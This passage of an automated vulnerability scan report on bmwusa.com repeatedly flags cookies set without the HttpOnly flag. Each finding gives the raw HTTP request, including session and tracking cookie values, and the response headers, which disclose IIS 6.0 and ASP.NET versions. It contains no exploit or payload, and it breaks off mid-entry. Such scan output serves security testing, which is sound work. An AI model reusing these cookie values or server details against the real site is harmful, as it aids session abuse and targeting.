The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328isportswagon/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:35:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:55:59 GMT;path=/
Content-Length: 226292


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.190. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isportswagon/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328isportswagon/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328isportswagon/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:35:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:55:11 GMT;path=/
Content-Length: 216599


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.191. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivecoupe/3seriescoupemediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328ixdrivecoupe/3seriescoupemediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328ixdrivecoupe/3seriescoupemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:21:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:41:39 GMT;path=/
Content-Length: 202376


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.192. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivecoupe/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328ixdrivecoupe/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328ixdrivecoupe/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:21:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:41:09 GMT;path=/
Content-Length: 214938


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.193. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivecoupe/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328ixdrivecoupe/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328ixdrivecoupe/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:21:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:41:47 GMT;path=/
Content-Length: 201402


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.194. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivecoupe/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328ixdrivecoupe/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328ixdrivecoupe/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:21:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:41:33 GMT;path=/
Content-Length: 216450


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.195. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesedan/3seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328ixdrivesedan/3seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328ixdrivesedan/3seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:11:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:31:53 GMT;path=/
Content-Length: 202375


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.196. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesedan/3seriessedanmediagallery.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328ixdrivesedan/3seriessedanmediagallery.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328ixdrivesedan/3seriessedanmediagallery.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:49:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:09:23 GMT;path=/
Content-Length: 202376


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.197. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesedan/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328ixdrivesedan/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328ixdrivesedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:48:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:08:18 GMT;path=/
Content-Length: 215003


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.198. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesedan/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328ixdrivesedan/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328ixdrivesedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:50:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:10:44 GMT;path=/
Content-Length: 201885


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.199. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesedan/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328ixdrivesedan/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328ixdrivesedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:48:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:08:27 GMT;path=/
Content-Length: 216441


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.200. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesportswagon/3seriessportswagonmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328ixdrivesportswagon/3seriessportswagonmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328ixdrivesportswagon/3seriessportswagonmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:36:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:56:36 GMT;path=/
Content-Length: 202621


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.201. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesportswagon/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328ixdrivesportswagon/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328ixdrivesportswagon/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:36:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:56:13 GMT;path=/
Content-Length: 215034


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.202. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesportswagon/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328ixdrivesportswagon/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328ixdrivesportswagon/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:38:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:58:11 GMT;path=/
Content-Length: 226530


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
